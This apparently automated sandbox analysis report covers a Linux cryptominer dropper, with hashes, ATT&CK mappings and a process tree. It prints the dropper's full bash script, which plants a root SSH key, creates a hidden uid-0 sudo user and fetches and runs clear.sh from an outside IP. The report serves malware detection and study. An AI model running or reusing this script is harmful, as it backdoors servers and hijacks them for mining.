7aaa0dc8ba8230a6f6af9e088ecbd51423177b90c7c7b3e439cefbf2da09065a

Analysis

max time kernel
138s
max time network
149s
platform
ubuntu-20.04_amd64
resource
ubuntu2004-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu2004-amd64-20240611-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system
submitted
05-01-2025 14:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

.ICE-Temp/run
Size

904KB
MD5

6f2ad308cfca8ada83dddeff3550ff1b
SHA1

6d51130d16c851c9cab5851ee13abec0cb24d20d
SHA256

bd8a77f63439dd7bc7e7da339ec4a9c097e5b316d42a0941b78b93a0bf664892
SHA512

e8c894292b0b71791d740fd372170d050683c7aa7720d4ba77aaf3e5e4d776d4da265e6f4bd94adec26c994408f5470b384f1b7a58841368c73ac836084bdb5c
SSDEEP

12288:z6r54g+nBwIjwv9og34rhz/BIYpVrydh+muhRn7ry9hv7E:z6rag+eI8v953uhz/BIYwnuhRfy9h

Score

8^/10

credential_access defense_evasion discovery persistence privilege_escalation

Malware Config

Signatures

Adds new SSH keys 1 TTPs 1 IoCs

Linux special file to hold SSH keys. The threat actor may add new keys for further remote access.

persistence privilege_escalation

SSH Authorized Keys

T1098.004

description	ioc	Process
File opened for modification	/root/.ssh/authorized_keys	bash

Modifies password files for system users/ groups 1 TTPs 8 IoCs

Modifies files storing password hashes of existing users/ groups, likely to grant additional privileges.

persistence credential_access defense_evasion

Pluggable Authentication Modules

T1556.003

description	ioc	Process
File opened for modification	/etc/gshadow	usermod
File opened for modification	/etc/passwd	useradd
File opened for modification	/etc/group	useradd
File opened for modification	/etc/gshadow	useradd
File opened for modification	/etc/shadow	useradd
File opened for modification	/etc/passwd	usermod
File opened for modification	/etc/shadow	usermod
File opened for modification	/etc/group	usermod

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1440	bash

OS Credential Dumping 1 TTPs 3 IoCs

Adversaries may attempt to dump credentials to use it in password cracking.

credential_access

/etc/passwd and /etc/shadow

T1003.008

description	ioc	Process
File opened for reading	/etc/shadow	useradd
File opened for reading	/etc/shadow	usermod
File opened for reading	/etc/shadow	passwd

Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs

Abuse sudo or cached sudo credentials to execute code.

privilege_escalation defense_evasion

Sudo and Sudo Caching

T1548.003

pid	Process
1463	usermod

Adds a user to the system 1 IoCs

pid	Process
1455	useradd

Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 1 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	pgrep

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/634/status	pgrep
File opened for reading	/proc/638/status	pgrep
File opened for reading	/proc/1156/cmdline	pgrep
File opened for reading	/proc/81/status	pgrep
File opened for reading	/proc/303/cmdline	pgrep
File opened for reading	/proc/583/cmdline	pgrep
File opened for reading	/proc/6/cmdline	pgrep
File opened for reading	/proc/1351/status	pgrep
File opened for reading	/proc/970/cmdline	pgrep
File opened for reading	/proc/994/cmdline	pgrep
File opened for reading	/proc/filesystems	mkdir
File opened for reading	/proc/9/cmdline	pgrep
File opened for reading	/proc/827/status	pgrep
File opened for reading	/proc/927/status	pgrep
File opened for reading	/proc/filesystems	id
File opened for reading	/proc/sys/kernel/random/boot_id	useradd
File opened for reading	/proc/397/cmdline	pgrep
File opened for reading	/proc/994/status	pgrep
File opened for reading	/proc/1343/status	pgrep
File opened for reading	/proc/89/status	pgrep
File opened for reading	/proc/618/status	pgrep
File opened for reading	/proc/647/cmdline	pgrep
File opened for reading	/proc/975/status	pgrep
File opened for reading	/proc/1340/cmdline	pgrep
File opened for reading	/proc/1/cmdline	pgrep
File opened for reading	/proc/22/status	pgrep
File opened for reading	/proc/74/status	pgrep
File opened for reading	/proc/1350/cmdline	pgrep
File opened for reading	/proc/102/cmdline	pgrep
File opened for reading	/proc/663/cmdline	pgrep
File opened for reading	/proc/1096/cmdline	pgrep
File opened for reading	/proc/173/cmdline	pgrep
File opened for reading	/proc/668/status	pgrep
File opened for reading	/proc/686/cmdline	pgrep
File opened for reading	/proc/1340/status	pgrep
File opened for reading	/proc/72/status	pgrep
File opened for reading	/proc/76/status	pgrep
File opened for reading	/proc/92/status	pgrep
File opened for reading	/proc/1030/status	pgrep
File opened for reading	/proc/1047/status	pgrep
File opened for reading	/proc/176/status	pgrep
File opened for reading	/proc/176/cmdline	pgrep
File opened for reading	/proc/618/cmdline	pgrep
File opened for reading	/proc/filesystems	mkdir
File opened for reading	/proc/11/status	pgrep
File opened for reading	/proc/86/cmdline	pgrep
File opened for reading	/proc/270/cmdline	pgrep
File opened for reading	/proc/498/status	pgrep
File opened for reading	/proc/771/status	pgrep
File opened for reading	/proc/999/cmdline	pgrep
File opened for reading	/proc/2/status	pgrep
File opened for reading	/proc/4/status	pgrep
File opened for reading	/proc/12/cmdline	pgrep
File opened for reading	/proc/20/status	pgrep
File opened for reading	/proc/488/cmdline	pgrep
File opened for reading	/proc/1081/cmdline	pgrep
File opened for reading	/proc/1086/cmdline	pgrep
File opened for reading	/proc/87/status	pgrep
File opened for reading	/proc/1438/cmdline	pgrep
File opened for reading	/proc/92/cmdline	pgrep
File opened for reading	/proc/269/cmdline	pgrep
File opened for reading	/proc/884/cmdline	pgrep
File opened for reading	/proc/1079/status	pgrep
File opened for reading	/proc/1342/status	pgrep

Writes file to tmp directory 2 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/.ICE-Temp/.settings/.rsakey	bash
File opened for modification	/tmp/.ICE-Temp/.settings/.usercreated	bash

/tmp/.ICE-Temp/run
/tmp/.ICE-Temp/run
1⤵
PID:1440

/bin/bash
/tmp/.ICE-Temp/run -c "exec '/tmp/.ICE-Temp/run' \"\$@\"" /tmp/.ICE-Temp/run
1⤵
PID:1440

/tmp/.ICE-Temp/run
/tmp/.ICE-Temp/run
1⤵
PID:1440

/bin/bash
/tmp/.ICE-Temp/run -c " #!/bin/bash myrsa='ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAkVgakr9+hG15jNtsAvFgXeTEuAtZ4M1Qtjmhtf68O6KeXbZ8EYt5M0DXEFOibWqMD8GURCchBItlWtlq825vQ7mGtyNHzzRLt5Hyjx2156Mz4B6oPPrw8LPJ273owYkJ8UCwpgYkoNdgeUaHtVcQM8K3GtRrikdtRewisRUlbp+f6zxqTWKIIouNOw0xOaCp5SihZHghPPibNTxSBZtkxGgsNmmcKXf3wvt/mB/3g6DoEHU+q++gajiA+aUCVfLzqKZ838R4S82valRmwoIYPE8eK776zQoJ7fpxOMLRM+ISryRPXgk/vxHRvMtrJNnMLhVo25h8/6dIkhVgUF9qkQ== universal-ssh-key' userpassword='ad1tzminer123!' addsshkey() { if [[ \$(id -u) = 0 ]]; then if [[ ! -d \".settings\" ]]; then mkdir .settings echo \$myrsa > .settings/.rsakey else echo \$myrsa > .settings/.rsakey fi if [[ ! -d \"/root/.ssh\" ]]; then mkdir /root/.ssh rsakey=`cat .settings/.rsakey` echo \$rsakey > \"/root/.ssh/authorized_keys\" chmod 600 /root/.ssh/authorized_keys chattr +i /root/.ssh return 1 else if [[ -f \"/root/.ssh/authorized_keys\" ]]; then chattr -i /root/.ssh/authorized_keys rm -rf /root/.ssh/authorized_keys rsakey=`cat .settings/.rsakey` echo \$rsakey > \"/root/.ssh/authorized_keys\" chmod 600 /root/.ssh/authorized_keys chattr +i /root/.ssh/authorized_keys return 1 else rsakey=`cat .settings/.rsakey` echo \$rsakey > \"/root/.ssh/authorized_keys\" chmod 600 /root/.ssh/authorized_keys chattr +i /root/.ssh/authorized_keys return 1 fi fi fi } setlocations() { if [[ ! -d \"/var/tmp/\" ]]; then clear echo \"[Miner]: I can't find '/var/tmp', miner will not start!\" sleep 2 exit 1 fi if [[ ! -d \"/var/tmp/.apachee\" ]]; then mkdir /var/tmp/.apachee echo \"\${PWD}/syst3md\" > /var/tmp/.apachee/.minerlocation echo \"\${PWD}/1\" > /var/tmp/.apachee/.hook1location echo \"\${PWD}/apachelogs\" > /var/tmp/.apachee/.apachelogslocation else echo \"\${PWD}/syst3md\" > /var/tmp/.apachee/.minerlocation echo \"\${PWD}/1\" > /var/tmp/.apachee/.hook1location echo \"\${PWD}/apachelogs\" > /var/tmp/.apachee/.apachelogslocation fi } createsudouser() { if [[ \$(id -u) = 0 ]]; then if [[ ! -f \".settings/.usercreated\" ]]; then /usr/sbin/useradd -u0 -g0 -o -s /bin/bash ad1tz ; usermod -aG sudo ad1tz echo -e \"\${userpassword}\\n\${userpassword}\" | passwd ad1tz sleep 1 echo \"User with sudo was created!\" > .settings/.usercreated fi fi } if ! pgrep -x syst3md >/dev/null then addsshkey sleep 2 setlocations sleep 2 createsudouser sleep 1 ./apachelogs > /dev/null 2>&1 & disown else echo -e \"[Miner]: Miner aleardy in background!\" exit 1; fi if [[ \$(id -u) = 0 ]]; then wget 51.83.134.135/clear.sh || curl -O 51.83.134.135/clear.sh ; chmod +x * ; . clear.sh ; rm -rf clear* else history -c rm -rf /home/\$(whoami)/.bash_history fi clear echo -e \"[Miner]: Hook started in background!\" sleep 1 " /tmp/.ICE-Temp/run
1⤵
- Adds new SSH keys
- File and Directory Permissions Modification
- Writes file to tmp directory
PID:1440
- /usr/bin/pgrep
  pgrep -x syst3md
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1441
- /usr/bin/id
  id -u
  2⤵
  - Reads runtime system information
  PID:1442
- /usr/bin/mkdir
  mkdir /root/.ssh
  2⤵
  - Reads runtime system information
  PID:1443
- /usr/bin/cat
  cat .settings/.rsakey
  2⤵
  PID:1444
- /usr/bin/chmod
  chmod 600 /root/.ssh/authorized_keys
  2⤵
  PID:1445
- /usr/bin/chattr
  chattr +i /root/.ssh
  2⤵
  PID:1446
- /usr/bin/sleep
  sleep 2
  2⤵
  PID:1447
- /usr/bin/mkdir
  mkdir /var/tmp/.apachee
  2⤵
  - Reads runtime system information
  PID:1452
- /usr/bin/sleep
  sleep 2
  2⤵
  PID:1453
- /usr/bin/id
  id -u
  2⤵
  PID:1454
- /usr/sbin/useradd
  /usr/sbin/useradd -u0 -g0 -o -s /bin/bash ad1tz
  2⤵
  - Modifies password files for system users/ groups
  - OS Credential Dumping
  - Adds a user to the system
  - Reads runtime system information
  PID:1455
- - /usr/sbin/nscd
    nscd -i passwd
    3⤵
    PID:1456
- - /usr/sbin/nscd
    nscd -i group
    3⤵
    PID:1457
- - /usr/sbin/sss_cache
    sss_cache -UG
    3⤵
    PID:1458
- - /sbin/pam_tally2
    pam_tally2 --user ad1tz --reset --quiet
    3⤵
    PID:1459
- - /usr/sbin/nscd
    nscd -i passwd
    3⤵
    PID:1460
- - /usr/sbin/nscd
    nscd -i group
    3⤵
    PID:1461
- - /usr/sbin/sss_cache
    sss_cache -UG
    3⤵
    PID:1462
- /usr/sbin/usermod
  usermod -aG sudo ad1tz
  2⤵
  - Modifies password files for system users/ groups
  - OS Credential Dumping
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  PID:1463
- - /usr/sbin/nscd
    nscd -i passwd
    3⤵
    PID:1464
- - /usr/sbin/nscd
    nscd -i group
    3⤵
    PID:1465
- - /usr/sbin/sss_cache
    sss_cache -UG
    3⤵
    PID:1466
- - /usr/sbin/nscd
    nscd -i passwd
    3⤵
    PID:1467
- - /usr/sbin/nscd
    nscd -i group
    3⤵
    PID:1468
- - /usr/sbin/sss_cache
    sss_cache -UG
    3⤵
    PID:1469
- /usr/bin/passwd
  passwd ad1tz
  2⤵
  - OS Credential Dumping
  PID:1471
- /usr/bin/sleep
  sleep 1
  2⤵
  PID:1472
- /usr/bin/sleep
  sleep 1
  2⤵
  PID:1473
- /usr/bin/id
  id -u
  2⤵
  PID:1475
- /tmp/.ICE-Temp/apachelogs
  ./apachelogs
  2⤵
  PID:1474
- /usr/bin/wget
  wget 51.83.134.135/clear.sh
  2⤵
  PID:1476

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

SSH Authorized Keys

T1098.004

Modify Authentication Process

T1556

Pluggable Authentication Modules

T1556.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Account Manipulation

T1098

SSH Authorized Keys

T1098.004

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Modify Authentication Process

T1556

Pluggable Authentication Modules

T1556.003

Credential Access

Modify Authentication Process

T1556

Pluggable Authentication Modules

T1556.003

OS Credential Dumping

T1003

/etc/passwd and /etc/shadow

T1003.008

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/group+

Filesize
1KB

MD5
a5ec19747607de8c9d9ab46274d5ad8c

SHA1
36853eb854467332e4d83548d5d5f940d6d92570

SHA256
5dedbf51c2a26174feaed61016a9fc61416478f6667fae072281114d919d03d7

SHA512
f9387a7d7a22acc61b29b614b18a56e5e18a1e9f769af1e7cda3c885297d43be3add146cf2c62c2dd89c39513a0aa0d0050a6b8fe5935a509f113d72c8798a63

Download Submit
/etc/gshadow+

Filesize
877B

MD5
06efad48916e0c50dd32af10527480c8

SHA1
4c902d291bb44db162acee1fa2b86b805d2cf8bc

SHA256
130340ec78e99c690b607096a1fb19b9f19f198657c665992ebd6e161e57fdf5

SHA512
b4929b563edf2651426b8b3f8fb8ae4f13c286a49266df08f9688f38cc2f6ab6844f0555b83b5b6f5115805b33a6024e057aec13a2619ebde766b8a50fc02603

Download Submit
/etc/nshadow

Filesize
1KB

MD5
536c0e07378d5a9ff1c87d016ab9fdf1

SHA1
a9bea3938ef73b0d9b3e8722af09db2ec02f7fcb

SHA256
d40b94b603e5a8fa272ad87dead23409e585553deb75d4f2795b684472eeb646

SHA512
715b68686761f583c5f0181b3fd5ecda27197de4055a21f3590c304c68e6e2c23df8fa41b624c91bbf0148eccd15b61e8f35bf906f12c39862ced136d32e733e

Download Submit
/etc/passwd+

Filesize
2KB

MD5
53cffe6adeec757967d75c3d89fd5ba3

SHA1
73b8e8205331f485abba6cfa912781b8c19a2a19

SHA256
fc7f43e9090f41e0a4a34ff2281869b27bb65bfa469d9181d89be40304f37ed3

SHA512
ba2f1b80e76c10d6ecc011d9eaea5ca6c80cc02877afd84758547887458c3b88f82bf09ff4ce1688af01490d9eed845f4c5995c3e1c552fe3e9a58e713e68479

Download Submit
/etc/shadow+

Filesize
1KB

MD5
b67863146544e302b7a0943589c8b58f

SHA1
a9ed4e5c869a231885a146266e3af7b2fcd660cf

SHA256
04ab87b51fd1f60f9471b20ab993fa765ebd55b6cc4ebe4fc590849dfe090835

SHA512
500c1af197be1af323bb39093fab5c8e18e49f2718c26d745366ff1785afbbbf0e8a6c7f0ab538f578a8c27c201c2a4233e64aa6321069bd9e8544904e220aed

Download Submit
/etc/subuid+

Filesize
37B

MD5
ba38a89f611ec4a07beed4cff2489dc3

SHA1
b31eb61c10b038af30fc928f9886b79e133375fe

SHA256
b958144da0e5454807286f0453833b5062d43ee1f5b50eff20f3ada40d6502a4

SHA512
b3f15f0c3934e04f3824c6b22d47ff5ddbe4fcf39556cf3e4ad9ce89affe21c31d8034d8736f32ee14bd26ca9eb65bf3a87d941cbdef5f0064cda5afd720c8c5

Download Submit
/tmp/.ICE-Temp/.settings/.rsakey

Filesize
399B

MD5
af277e373072bc8473f736a05c126806

SHA1
452a1facea886d300cb5c42e6d95034bf4b19626

SHA256
4799360542a39887a69db9abc7eda02908847d9605f35ef1b829a17d2578e59f

SHA512
40c8465b10619dd090e8b8fca079951445656b122f2815283b17466786c6e58861f9acac122aa538ffaef03632f3449618fad7552ced80330887a38f10d3fccc

Download Submit
/tmp/.ICE-Temp/.settings/.usercreated

Filesize
28B

MD5
9eb3464f46228a4ffcc260a6be7b7a52

SHA1
0e3b4c349112b9040c6683686bc9b2be8db348c2

SHA256
78ba3e1474a147e3fc700ca37ff49c671e997cbb47f0c4588b8012ba2e3e38b3

SHA512
d1f39c6a3ea8ab26a828db09f3ac79e18bd8bff490c0ab44865ab30e6c1d34309ee47ca3e9178a227710a0e4818f4e224fe56332ab4ca463616e0d164f94ef88

Download Submit
/var/tmp/.apachee/.apachelogslocation

Filesize
26B

MD5
9e6f2b66dee0238e585e4b4aea331bb2

SHA1
74ee97dc84812ce28a17e48b75782e06008e1019

SHA256
0476869cb92cdf45a4977422ce3d14dd257647f5c838d37bc9002a7fec60bf62

SHA512
4f31848aa3aa691834581ebc05be5fabbe48dc453f61a66cac8261d4a20821927e4d620f36b7057fca85327c96833f6951fa3c446dfd4377447659d1d2a5d621

Download Submit
/var/tmp/.apachee/.hook1location

Filesize
17B

MD5
18755e677d11f2346836a95b62bc079f

SHA1
fc80d163c884875eb813b136fb553067ff58b540

SHA256
acabdeb049c431c335c8ec2516c6512f0966aed07b544c49e604a83a495c26d4

SHA512
ba0ad4c5a33dee7dbd181bf29b0ed9fac5e4fdaece00e2370fa0d082ade575024616b6d75dafea61c917e9e4fec7e508d24d6265637a4b1a981a8a88be70aaa6

Download Submit
/var/tmp/.apachee/.minerlocation

Filesize
23B

MD5
c0e222e3eaaa00229ca7c9a5d04d288e

SHA1
661138c453e8f4bfbd2669384f7f9f25adb7e603

SHA256
bcea2cc016091e576f273c60486238ede715931d519b31170b929ab1eeaa9c37

SHA512
35d84b15967e35d9e17d523731a5a2a0e4ccccd9fad070e6c3ce4bd9b7bc5d015b4576907fb9456d0aedceb98c183d49f991fa732fed279dbc11777851cdddfa

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads